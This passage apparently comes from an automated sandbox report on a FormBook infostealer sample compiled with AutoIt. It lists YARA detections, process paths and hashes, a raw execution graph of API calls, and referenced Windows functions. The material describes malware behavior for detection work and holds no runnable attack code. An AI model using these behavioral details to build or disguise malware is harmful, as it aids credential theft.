                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          Target ID:7
                          Start time:06:03:05
                          Start date:13/09/2024
                          Path:C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe"
                          Imagebase:0x1c0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          Target ID:8
                          Start time:06:03:22
                          Start date:13/09/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x7ff79f9e0000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true


                            Execution Graph

                            Execution Coverage:3.4%
                            Dynamic/Decrypted Code Coverage:2%
                            Signature Coverage:12%
                            Total number of Nodes:1943
                            Total number of Limit Nodes:166
                            execution_graph
109376 83e59 109375->109376 109377 83e6a FreeLibrary 109375->109377 109376->109263 109377->109376 109427 83f20 109378->109427 109381 83f85 109382 83f8d FreeLibrary 109381->109382 109383 83f96 109381->109383 109382->109383 109385 a4129 109383->109385 109435 a413e 109385->109435 109387 83fba 109387->109318 109387->109319 109514 83eb3 109388->109514 109391 83e9f 109393 83ea8 FreeLibrary 109391->109393 109394 83eb1 109391->109394 109393->109394 109395 84010 109394->109395 109396 a010a 48 API calls 109395->109396 109397 84025 109396->109397 109398 84bce 48 API calls 109397->109398 109399 84031 _memmove 109398->109399 109400 8406c 109399->109400 109402 84129 109399->109402 109403 84161 109399->109403 109401 841cb 57 API calls 109400->109401 109409 84075 109401->109409 109522 831f2 CreateStreamOnHGlobal 109402->109522 109533 cd03f 93 API calls 109403->109533 109406 8417d 64 API calls 109406->109409 109408 84109 109408->109326 109409->109406 109409->109408 109410 f5794 109409->109410 109528 841a7 109409->109528 109411 841a7 83 API calls 109410->109411 109412 f57a8 109411->109412 109413 8417d 64 API calls 109412->109413 109413->109408 109415 f587d 109414->109415 109416 8418f 109414->109416 109557 a44ae 109416->109557 109419 cc846 109577 cc6a0 109419->109577 109421 cc85c 109421->109334 109423 f58bf 109422->109423 109424 841da 109422->109424 109582 a4af5 109424->109582 109426 841e2 109426->109336 109431 83f32 109427->109431 109430 83f08 LoadLibraryA GetProcAddress 109430->109381 109432 83f28 109431->109432 109433 83f3b LoadLibraryA 109431->109433 109432->109381 109432->109430 109433->109432 109434 83f4c GetProcAddress 109433->109434 109434->109432 109437 a414a __fcloseall 109435->109437 109436 a415d 109483 a889e 47 API calls __getptd_noexit 109436->109483 109437->109436 109440 a418e 109437->109440 109439 a4162 109484 a7aa0 8 API calls __mbstowcs_s_l 109439->109484 109454 af278 109440->109454 109443 a4193 109444 a41a9 109443->109444 109445 a419c 109443->109445 109447 a41d3 
109444->109447 109448 a41b3 109444->109448 109485 a889e 47 API calls __getptd_noexit 109445->109485 109468 af390 109447->109468 109486 a889e 47 API calls __getptd_noexit 109448->109486 109450 a416d __fcloseall @_EH4_CallFilterFunc@8 109450->109387 109455 af284 __fcloseall 109454->109455 109456 a8984 __lock 47 API calls 109455->109456 109466 af292 109456->109466 109457 af302 109488 af387 109457->109488 109458 af309 109493 a7660 47 API calls __crtGetStringTypeA_stat 109458->109493 109461 af37c __fcloseall 109461->109443 109462 af310 109462->109457 109463 af31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 109462->109463 109463->109457 109465 a8a0c __mtinitlocknum 47 API calls 109465->109466 109466->109457 109466->109458 109466->109465 109491 a5ade 48 API calls __lock 109466->109491 109492 a5b48 LeaveCriticalSection LeaveCriticalSection _doexit 109466->109492 109477 af3b0 __wopenfile 109468->109477 109469 af3ca 109498 a889e 47 API calls __getptd_noexit 109469->109498 109471 af585 109471->109469 109475 af5e8 109471->109475 109472 af3cf 109499 a7aa0 8 API calls __mbstowcs_s_l 109472->109499 109474 a41de 109487 a4200 LeaveCriticalSection LeaveCriticalSection _fseek 109474->109487 109495 b7179 109475->109495 109477->109469 109477->109471 109500 a247b 59 API calls 2 library calls 109477->109500 109479 af57e 109479->109471 109501 a247b 59 API calls 2 library calls 109479->109501 109481 af59d 109481->109471 109502 a247b 59 API calls 2 library calls 109481->109502 109483->109439 109484->109450 109485->109450 109486->109450 109487->109450 109494 a8ae8 LeaveCriticalSection 109488->109494 109490 af38e 109490->109461 109491->109466 109492->109466 109493->109462 109494->109490 109503 b6961 109495->109503 109497 b7192 109497->109474 109498->109472 109499->109474 109500->109479 109501->109481 109502->109471 109506 b696d __fcloseall 109503->109506 109504 b697f 109505 a889e __mbstowcs_s_l 47 API calls 109504->109505 109507 b6984 109505->109507 109506->109504 109508 b69b6 
109506->109508 109509 a7aa0 __mbstowcs_s_l 8 API calls 109507->109509 109510 b6a28 __wsopen_helper 110 API calls 109508->109510 109513 b698e __fcloseall 109509->109513 109511 b69d3 109510->109511 109512 b69fc __wsopen_helper LeaveCriticalSection 109511->109512 109512->109513 109513->109497 109518 83ec5 109514->109518 109517 83ef0 LoadLibraryA GetProcAddress 109517->109391 109519 83e91 109518->109519 109520 83ece LoadLibraryA 109518->109520 109519->109391 109519->109517 109520->109519 109521 83edf GetProcAddress 109520->109521 109521->109519 109523 83229 109522->109523 109524 8320c FindResourceExW 109522->109524 109523->109400 109524->109523 109525 f57d3 LoadResource 109524->109525 109525->109523 109526 f57e8 SizeofResource 109525->109526 109526->109523 109527 f57fc LockResource 109526->109527 109527->109523 109529 f589d 109528->109529 109530 841b6 109528->109530 109534 a471d 109530->109534 109532 841c4 109532->109409 109533->109400 109538 a4729 __fcloseall 109534->109538 109535 a4737 109547 a889e 47 API calls __getptd_noexit 109535->109547 109537 a475d 109549 a5a9f 109537->109549 109538->109535 109538->109537 109539 a473c 109548 a7aa0 8 API calls __mbstowcs_s_l 109539->109548 109542 a4763 109555 a468e 81 API calls 3 library calls 109542->109555 109544 a4747 __fcloseall 109544->109532 109545 a4772 109556 a4794 LeaveCriticalSection LeaveCriticalSection _fseek 109545->109556 109547->109539 109548->109544 109550 a5aaf 109549->109550 109551 a5ad1 EnterCriticalSection 109549->109551 109550->109551 109552 a5ab7 109550->109552 109553 a5ac7 109551->109553 109554 a8984 __lock 47 API calls 109552->109554 109553->109542 109554->109553 109555->109545 109556->109544 109560 a44c9 109557->109560 109559 841a0 109559->109419 109561 a44d5 __fcloseall 109560->109561 109562 a44eb _memset 109561->109562 109563 a4518 109561->109563 109564 a4510 __fcloseall 109561->109564 109573 a889e 47 API calls __getptd_noexit 109562->109573 109565 a5a9f __lock_file 48 API calls 109563->109565 
109564->109559 109566 a451e 109565->109566 109575 a42eb 62 API calls 5 library calls 109566->109575 109568 a4505 109574 a7aa0 8 API calls __mbstowcs_s_l 109568->109574 109571 a4534 109576 a4552 LeaveCriticalSection LeaveCriticalSection _fseek 109571->109576 109573->109568 109574->109564 109575->109571 109576->109564 109580 a40da GetSystemTimeAsFileTime 109577->109580 109579 cc6af 109579->109421 109581 a4108 __aulldiv 109580->109581 109581->109579 109583 a4b01 __fcloseall 109582->109583 109584 a4b0f 109583->109584 109585 a4b24 109583->109585 109596 a889e 47 API calls __getptd_noexit 109584->109596 109586 a5a9f __lock_file 48 API calls 109585->109586 109588 a4b2a 109586->109588 109598 a479c 55 API calls 4 library calls 109588->109598 109589 a4b14 109597 a7aa0 8 API calls __mbstowcs_s_l 109589->109597 109592 a4b35 109599 a4b55 LeaveCriticalSection LeaveCriticalSection _fseek 109592->109599 109594 a4b47 109595 a4b1f __fcloseall 109594->109595 109595->109426 109596->109589 109597->109595 109598->109592 109599->109594 109604 cce6d __tzset_nolock _wcscmp 109600->109604 109601 ccd03 109601->109342 109601->109368 109602 8417d 64 API calls 109602->109604 109603 cc846 GetSystemTimeAsFileTime 109603->109604 109604->109601 109604->109602 109604->109603 109605 841a7 83 API calls 109604->109605 109605->109604 109606->109370 109608 a4280 __fcloseall 109607->109608 109609 a42ac 109608->109609 109610 a4294 109608->109610 109613 a5a9f __lock_file 48 API calls 109609->109613 109617 a42a4 __fcloseall 109609->109617 109636 a889e 47 API calls __getptd_noexit 109610->109636 109612 a4299 109637 a7aa0 8 API calls __mbstowcs_s_l 109612->109637 109615 a42be 109613->109615 109620 a4208 109615->109620 109617->109375 109621 a422b 109620->109621 109622 a4217 109620->109622 109628 a4227 109621->109628 109639 a3914 109621->109639 109679 a889e 47 API calls __getptd_noexit 109622->109679 109624 a421c 109680 a7aa0 8 API calls __mbstowcs_s_l 109624->109680 109638 a42e3 LeaveCriticalSection 
LeaveCriticalSection _fseek 109628->109638 109632 a4245 109656 af782 109632->109656 109634 a424b 109634->109628 109635 a28ca _free 47 API calls 109634->109635 109635->109628 109636->109612 109637->109617 109638->109617 109640 a394b 109639->109640 109641 a3927 109639->109641 109645 af8e6 109640->109645 109641->109640 109642 a35c3 __ftell_nolock 47 API calls 109641->109642 109643 a3944 109642->109643 109681 abd14 109643->109681 109646 a423f 109645->109646 109647 af8f3 109645->109647 109649 a35c3 109646->109649 109647->109646 109648 a28ca _free 47 API calls 109647->109648 109648->109646 109650 a35cd 109649->109650 109651 a35e2 109649->109651 109787 a889e 47 API calls __getptd_noexit 109650->109787 109651->109632 109653 a35d2 109788 a7aa0 8 API calls __mbstowcs_s_l 109653->109788 109655 a35dd 109655->109632 109657 af78e __fcloseall 109656->109657 109658 af7ae 109657->109658 109659 af796 109657->109659 109660 af82b 109658->109660 109666 af7d8 109658->109666 109804 a886a 47 API calls __getptd_noexit 109659->109804 109808 a886a 47 API calls __getptd_noexit 109660->109808 109663 af79b 109805 a889e 47 API calls __getptd_noexit 109663->109805 109665 af830 109809 a889e 47 API calls __getptd_noexit 109665->109809 109668 ab6a0 ___lock_fhandle 49 API calls 109666->109668 109670 af7de 109668->109670 109669 af838 109810 a7aa0 8 API calls __mbstowcs_s_l 109669->109810 109672 af7fc 109670->109672 109673 af7f1 109670->109673 109806 a889e 47 API calls __getptd_noexit 109672->109806 109789 af84c 109673->109789 109674 af7a3 __fcloseall 109674->109634 109677 af7f7 109807 af823 LeaveCriticalSection __unlock_fhandle 109677->109807 109679->109624 109680->109628 109682 abd20 __fcloseall 109681->109682 109683 abd28 109682->109683 109684 abd40 109682->109684 109779 a886a 47 API calls __getptd_noexit 109683->109779 109685 abdd5 109684->109685 109690 abd72 109684->109690 109784 a886a 47 API calls __getptd_noexit 109685->109784 109687 abd2d 109780 a889e 47 API calls __getptd_noexit 109687->109780 
109706 ab6a0 109690->109706 109691 abdda 109785 a889e 47 API calls __getptd_noexit 109691->109785 109692 abd35 __fcloseall 109692->109640 109695 abd78 109697 abd8b 109695->109697 109698 abd9e 109695->109698 109696 abde2 109786 a7aa0 8 API calls __mbstowcs_s_l 109696->109786 109715 abdf6 109697->109715 109781 a889e 47 API calls __getptd_noexit 109698->109781 109702 abd97 109783 abdcd LeaveCriticalSection __unlock_fhandle 109702->109783 109703 abda3 109782 a886a 47 API calls __getptd_noexit 109703->109782 109707 ab6ac __fcloseall 109706->109707 109708 ab6f9 EnterCriticalSection 109707->109708 109710 a8984 __lock 47 API calls 109707->109710 109709 ab71f __fcloseall 109708->109709 109709->109695 109711 ab6d0 109710->109711 109712 ab6db InitializeCriticalSectionAndSpinCount 109711->109712 109713 ab6ed 109711->109713 109712->109713 109714 ab723 ___lock_fhandle LeaveCriticalSection 109713->109714 109714->109708 109716 abe03 __ftell_nolock 109715->109716 109717 abe35 109716->109717 109718 abe5f 109716->109718 109719 abe40 109716->109719 109720 ab4bf __87except 6 API calls 109717->109720 109722 abeb8 109718->109722 109723 abe9c 109718->109723 109721 a886a __dosmaperr 47 API calls 109719->109721 109724 ac61e 109720->109724 109725 abe45 109721->109725 109727 abecf 109722->109727 109731 b05df __lseeki64_nolock 49 API calls 109722->109731 109726 a886a __dosmaperr 47 API calls 109723->109726 109724->109702 109728 a889e __mbstowcs_s_l 47 API calls 109725->109728 109730 abea1 109726->109730 109729 b49a2 __flswbuf 47 API calls 109727->109729 109732 abe4c 109728->109732 109733 abedd 109729->109733 109734 a889e __mbstowcs_s_l 47 API calls 109730->109734 109731->109727 109735 a7aa0 __mbstowcs_s_l 8 API calls 109732->109735 109736 ac1fe 109733->109736 109741 a869d ____lc_codepage_func 47 API calls 109733->109741 109737 abea8 109734->109737 109735->109717 109738 ac56b WriteFile 109736->109738 109739 ac216 109736->109739 109740 a7aa0 __mbstowcs_s_l 8 API calls 109737->109740 109743 ac594 
GetLastError 109738->109743 109748 ac1c3 109738->109748 109742 ac30d 109739->109742 109750 ac22c 109739->109750 109740->109717 109744 abf03 GetConsoleMode 109741->109744 109752 ac416 109742->109752 109755 ac318 109742->109755 109743->109748 109744->109736 109746 abf3c 109744->109746 109745 ac5ce 109745->109717 109747 a889e __mbstowcs_s_l 47 API calls 109745->109747 109746->109736 109749 abf4c GetConsoleCP 109746->109749 109753 ac5f6 109747->109753 109748->109717 109748->109745 109754 ac5aa 109748->109754 109749->109748 109756 abf75 109749->109756 109750->109745 109751 ac29c WriteFile 109750->109751 109751->109743 109757 ac2d9 109751->109757 109752->109745 109758 ac48b WideCharToMultiByte 109752->109758 109759 a886a __dosmaperr 47 API calls 109753->109759 109760 ac5b1 109754->109760 109761 ac5c5 109754->109761 109755->109745 109762 ac391 WriteFile 109755->109762 109756->109748 109772 a22a8 __chsize_nolock 57 API calls 109756->109772 109774 b4ea7 59 API calls __chsize_nolock 109756->109774 109775 ac042 WideCharToMultiByte 109756->109775 109777 ac0a9 109756->109777 109757->109748 109757->109750 109771 ac308 109757->109771 109758->109743 109763 ac4d2 109758->109763 109759->109717 109764 a889e __mbstowcs_s_l 47 API calls 109760->109764 109765 a887d __dosmaperr 47 API calls 109761->109765 109762->109743 109766 ac3e0 109762->109766 109763->109748 109763->109752 109767 ac4da WriteFile 109763->109767 109763->109771 109768 ac5b6 109764->109768 109765->109717 109766->109748 109766->109755 109766->109771 109767->109763 109769 ac52d GetLastError 109767->109769 109770 a886a __dosmaperr 47 API calls 109768->109770 109769->109763 109770->109717 109771->109748 109772->109756 109773 b6634 WriteConsoleW CreateFileW __chsize_nolock 109773->109777 109774->109756 109775->109748 109776 ac07d WriteFile 109775->109776 109776->109743 109776->109777 109777->109743 109777->109748 109777->109756 109777->109773 109778 ac0d4 WriteFile 109777->109778 109778->109743 109778->109777 109779->109687 
109780->109692 109781->109703 109782->109702 109783->109692 109784->109691 109785->109696 109786->109692 109787->109653 109788->109655 109811 ab957 109789->109811 109791 af8b0 109824 ab8d1 48 API calls 2 library calls 109791->109824 109793 af85a 109793->109791 109795 ab957 __lseek_nolock 47 API calls 109793->109795 109803 af88e 109793->109803 109794 af8b8 109802 af8da 109794->109802 109825 a887d 47 API calls 2 library calls 109794->109825 109797 af885 109795->109797 109796 ab957 __lseek_nolock 47 API calls 109798 af89a CloseHandle 109796->109798 109800 ab957 __lseek_nolock 47 API calls 109797->109800 109798->109791 109801 af8a6 GetLastError 109798->109801 109800->109803 109801->109791 109802->109677 109803->109791 109803->109796 109804->109663 109805->109674 109806->109677 109807->109674 109808->109665 109809->109669 109810->109674 109812 ab962 109811->109812 109813 ab977 109811->109813 109814 a886a __dosmaperr 47 API calls 109812->109814 109815 a886a __dosmaperr 47 API calls 109813->109815 109817 ab99c 109813->109817 109816 ab967 109814->109816 109818 ab9a6 109815->109818 109819 a889e __mbstowcs_s_l 47 API calls 109816->109819 109817->109793 109820 a889e __mbstowcs_s_l 47 API calls 109818->109820 109821 ab96f 109819->109821 109822 ab9ae 109820->109822 109821->109793 109823 a7aa0 __mbstowcs_s_l 8 API calls 109822->109823 109823->109821 109824->109794 109825->109802 109826->109272 109827->109274 109828->109287 109829->109289 109830->109286 109831->109302 109832->109296 109834 f4aa5 GetFullPathNameW 109833->109834 109835 831c7 109833->109835 109838 f4abd 109834->109838 109890 83bcf 109835->109890 109837 831cd GetFullPathNameW 109839 831e7 109837->109839 109838->109838 109839->109128 109841 83a8b SHGetDesktopFolder 109840->109841 109844 83ade 109840->109844 109842 83a99 109841->109842 109841->109844 109843 83ac8 SHGetPathFromIDListW 109842->109843 109842->109844 109843->109844 109844->109132 109850 83ba9 109845->109850 109852 83b72 109845->109852 109846 a1bc7 
_W_store_winword 59 API calls 109846->109850 109847 83bcf 48 API calls 109848 83b7d 109847->109848 109894 8197e 109848->109894 109849 f33e5 109850->109846 109850->109849 109850->109852 109852->109847 109854 8197e 48 API calls 109855 83b9f 109854->109855 109856 83dcb 109855->109856 109857 83f9b 136 API calls 109856->109857 109858 83def 109857->109858 109859 f39f9 109858->109859 109861 83f9b 136 API calls 109858->109861 109860 ccc82 122 API calls 109859->109860 109862 f3a0e 109860->109862 109863 83e02 109861->109863 109865 f3a2f 109862->109865 109866 f3a12 109862->109866 109863->109859 109864 83e0a 109863->109864 109867 f3a1a 109864->109867 109868 83e16 109864->109868 109870 a010a 48 API calls 109865->109870 109869 83e39 84 API calls 109866->109869 109916 c757b 87 API calls _wprintf 109867->109916 109915 8bdf0 163 API calls 8 library calls 109868->109915 109869->109867 109879 f3a74 Mailbox 109870->109879 109873 83e2e 109873->109130 109874 f3a28 109874->109865 109875 f3c24 109876 a28ca _free 47 API calls 109875->109876 109877 f3c2c 109876->109877 109878 83e39 84 API calls 109877->109878 109881 f3c35 109878->109881 109879->109875 109879->109881 109887 8caee 48 API calls 109879->109887 109900 8b6d0 109879->109900 109909 8a870 109879->109909 109917 c30ac 48 API calls _memmove 109879->109917 109918 c2fcd 60 API calls 2 library calls 109879->109918 109919 ca525 48 API calls 109879->109919 109884 a28ca _free 47 API calls 109881->109884 109885 83e39 84 API calls 109881->109885 109920 c32b0 86 API calls 4 library calls 109881->109920 109884->109881 109885->109881 109887->109879 109891 83bd9 __NMSG_WRITE 109890->109891 109892 a010a 48 API calls 109891->109892 109893 83bee _wcscpy 109892->109893 109893->109837 109895 81990 109894->109895 109899 819af _memmove 109894->109899 109898 a010a 48 API calls 109895->109898 109896 a010a 48 API calls 109897 819c6 109896->109897 109897->109854 109898->109899 109899->109896 109901 8b789 109900->109901 109905 8b6e3 _memmove 109900->109905 
109903 a010a 48 API calls 109901->109903 109902 a010a 48 API calls 109906 8b6ea 109902->109906 109903->109905 109904 8b71b 109904->109879 109905->109902 109906->109904 109907 a010a 48 API calls 109906->109907 109908 8b74d 109907->109908 109908->109879 109910 8a883 109909->109910 109913 8a93d 109909->109913 109911 a010a 48 API calls 109910->109911 109910->109913 109914 8a8c1 109910->109914 109911->109914 109912 a010a 48 API calls 109912->109914 109913->109879 109914->109912 109914->109913 109915->109873 109916->109874 109917->109879 109918->109879 109919->109879 109920->109881 109922 8a72c 109921->109922 109928 8a848 109921->109928 109923 a010a 48 API calls 109922->109923 109922->109928 109924 8a753 109923->109924 109925 a010a 48 API calls 109924->109925 109926 8a7c5 109925->109926 109926->109928 109930 8a870 48 API calls 109926->109930 109931 8b6d0 48 API calls 109926->109931 109934 8ace0 91 API calls 2 library calls 109926->109934 109935 ca3ee 48 API calls 109926->109935 109928->109139 109930->109926 109931->109926 109932->109141 109933->109143 109934->109926 109935->109926 109937 f4ad8 EnumResourceNamesW 109936->109937 109938 831a2 LoadImageW 109936->109938 109939 83118 RegisterClassExW 109937->109939 109938->109939 109940 82f58 GetSysColorBrush RegisterClassExW RegisterWindowMessageW 109939->109940 109941 82fe9 ImageList_Create LoadIconW ImageList_ReplaceIcon 109940->109941 109941->109157 109943 83618 109942->109943 109944 f44d1 109942->109944 109943->109163 109968 c6237 61 API calls _W_store_winword 109943->109968 109944->109943 109945 f44da DestroyIcon 109944->109945 109945->109943 109947 83900 109946->109947 109967 839d5 Mailbox 109946->109967 109969 87b6e 109947->109969 109950 f453f LoadStringW 109954 f4559 109950->109954 109951 8391b 109952 87e53 48 API calls 109951->109952 109953 83930 109952->109953 109953->109954 109956 83941 109953->109956 109975 839e8 48 API calls 2 library calls 109954->109975 109958 839da 109956->109958 109959 8394b 109956->109959 
109957 f4564 109962 f4578 109957->109962 109964 83956 _memset _wcscpy 109957->109964 109961 8c935 48 API calls 109958->109961 109974 839e8 48 API calls 2 library calls 109959->109974 109961->109964 109976 839e8 48 API calls 2 library calls 109962->109976 109966 839ba Shell_NotifyIconW 109964->109966 109965 f4586 109966->109967 109967->109168 109968->109163 109970 a010a 48 API calls 109969->109970 109971 87b93 109970->109971 109972 8a6f8 48 API calls 109971->109972 109973 8390e 109972->109973 109973->109950 109973->109951 109974->109964 109975->109957 109976->109965 109978 8e7fd 109977->109978 109979 8e80f 109977->109979 110174 8dcd0 346 API calls 2 library calls 109978->110174 110175 cd520 86 API calls 4 library calls 109979->110175 109981 8e806 109981->109226 109983 f98e8 109983->109983 109985 8ea20 109984->109985 109986 8fa40 346 API calls 109985->109986 109991 8ea89 109985->109991 109988 f9919 109986->109988 109987 f99bc 110179 cd520 86 API calls 4 library calls 109987->110179 109988->109991 110176 cd520 86 API calls 4 library calls 109988->110176 109989 8fa40 346 API calls 110021 8ecd7 Mailbox 109989->110021 109994 8d3d2 48 API calls 109991->109994 110014 8eb18 109991->110014 109991->110021 109992 8d3d2 48 API calls 109995 f9997 109992->109995 109997 f9963 109994->109997 110178 a1b2a 52 API calls __cinit 109995->110178 110177 a1b2a 52 API calls __cinit 109997->110177 109998 8d380 55 API calls 109998->110021 110000 f9d70 110188 de2fb 346 API calls Mailbox 110000->110188 110002 f9e49 110193 cd520 86 API calls 4 library calls 110002->110193 110003 f9dc2 110190 cd520 86 API calls 4 library calls 110003->110190 110004 f9ddf 110191 dc235 346 API calls Mailbox 110004->110191 110008 8342c 48 API calls 110008->110021 110012 f9df7 110033 8ef0c Mailbox 110012->110033 110192 cd520 86 API calls 4 library calls 110012->110192 110013 914a0 48 API calls 110013->110021 110014->109992 110014->110021 110016 8f56f 110016->110033 110189 cd520 86 API calls 4 library calls 
110016->110189 110018 8d805 48 API calls 110018->110021 110019 cd520 86 API calls 110019->110021 110020 f9a3c 110182 dd154 48 API calls 110020->110182 110021->109987 110021->109989 110021->109998 110021->110000 110021->110002 110021->110003 110021->110004 110021->110008 110021->110013 110021->110016 110021->110018 110021->110019 110021->110020 110021->110033 110180 ca3ee 48 API calls 110021->110180 110181 dede9 346 API calls 110021->110181 110186 ba599 InterlockedDecrement 110021->110186 110187 df4df 346 API calls 110021->110187 110023 f9a48 110025 f9a56 110023->110025 110026 f9a9b 110023->110026 110183 ca485 48 API calls 110025->110183 110029 f9a91 Mailbox 110026->110029 110184 cafce 48 API calls 110026->110184 110027 8fa40 346 API calls 110027->110033 110029->110027 110031 f9ad8 110185 9df08 48 API calls 110031->110185 110033->109226 110035 9469f 110034->110035 110036 94537 110034->110036 110039 8caee 48 API calls 110035->110039 110037 94543 110036->110037 110038 f7820 110036->110038 110241 94040 346 API calls _memmove 110037->110241 110242 de713 346 API calls Mailbox 110038->110242 110046 945e4 Mailbox 110039->110046 110042 f782c 110043 94639 Mailbox 110042->110043 110243 cd520 86 API calls 4 library calls 110042->110243 110043->109226 110045 94559 110045->110042 110045->110043 110045->110046 110047 83e39 84 API calls 110046->110047 110194 d01e4 110046->110194 110235 e0bfa 110046->110235 110238 9dd84 110046->110238 110047->110043 110051->109226 110435 8a9a0 110052->110435 110054 936e7 110055 93778 110054->110055 110056 fa269 110054->110056 110112 93aa8 110054->110112 110447 9bc04 86 API calls 110055->110447 110453 cd520 86 API calls 4 library calls 110056->110453 110061 fa3e9 110458 cd520 86 API calls 4 library calls 110061->110458 110062 93793 110062->110112 110114 9396b Mailbox _memmove 110062->110114 110116 fa68d 110062->110116 110440 810e8 110062->110440 110066 fa289 110066->110061 110070 8d2d2 53 API calls 110066->110070 110067 fa583 110069 8fa40 346 API 
calls 110067->110069 110068 fa45c 110462 cd520 86 API calls 4 library calls 110068->110462 110072 fa5b5 110069->110072 110073 fa2fb 110070->110073 110079 8d380 55 API calls 110072->110079 110072->110112 110075 fa40f 110073->110075 110076 fa303 110073->110076 110459 9cf79 49 API calls 110075->110459 110089 fa317 110076->110089 110098 fa341 110076->110098 110078 9384e 110082 fa60c 110078->110082 110083 938e5 110078->110083 110078->110114 110085 fa5e6 110079->110085 110468 cd231 50 API calls 110082->110468 110090 a010a 48 API calls 110083->110090 110467 cd520 86 API calls 4 library calls 110085->110467 110086 8fa40 346 API calls 110086->110114 110088 fa42c 110092 fa44d 110088->110092 110093 fa441 110088->110093 110454 cd520 86 API calls 4 library calls 110089->110454 110101 938ec 110090->110101 110091 9bc5c 48 API calls 110091->110114 110461 cd520 86 API calls 4 library calls 110092->110461 110460 cd520 86 API calls 4 library calls 110093->110460 110099 fa366 110098->110099 110103 fa384 110098->110103 110455 df211 346 API calls 110099->110455 110106 8e1f0 346 API calls 110101->110106 110109 9399f 110101->110109 110104 fa37a 110103->110104 110456 df4df 346 API calls 110103->110456 110104->110112 110457 9baef 48 API calls _memmove 110104->110457 110106->110114 110107 a010a 48 API calls 110107->110114 110110 8c935 48 API calls 110109->110110 110111 939c0 110109->110111 110110->110111 110111->110112 110115 fa65e 110111->110115 110119 93a05 110111->110119 110121 93ab5 Mailbox 110112->110121 110452 cd520 86 API calls 4 library calls 110112->110452 110114->110066 110114->110067 110114->110068 110114->110085 110114->110086 110114->110091 110114->110107 110114->110109 110114->110112 110449 8d500 53 API calls __cinit 110114->110449 110450 8d420 53 API calls 110114->110450 110451 9baef 48 API calls _memmove 110114->110451 110463 dd21a 82 API calls Mailbox 110114->110463 110464 c89e0 53 API calls 110114->110464 110465 8d772 55 API calls 110114->110465 110466 8d89e 50 API calls 

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6b8a0424962131512bece74feedde033fc7021fba475b674d5e9915af5efedb
                            • Instruction ID: 5d349ddb6c563350a502faa4a9121cf9d0dd49b6bca826cce04982da19187bff
                            • Opcode Fuzzy Hash: d6b8a0424962131512bece74feedde033fc7021fba475b674d5e9915af5efedb
                            • Instruction Fuzzy Hash: E0322C75B026288FDB248FA9DC44AE9B7F5FB4B310F4941D9E40AA7A51D7309E80CF52

                            Control-flow Graph

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0008376D
                              • Part of subcall function 00084257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00000104,?,00000000,00000001,00000000), ref: 0008428C
                            • IsDebuggerPresent.KERNEL32(?,?), ref: 0008377F
                            • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00000104,?,00141120,C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00141124,?,?), ref: 000837EE
                              • Part of subcall function 000834F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0008352A
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00083860
                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00132934,00000010), ref: 000F21C5
                            • SetCurrentDirectoryW.KERNEL32(?,?), ref: 000F21FD
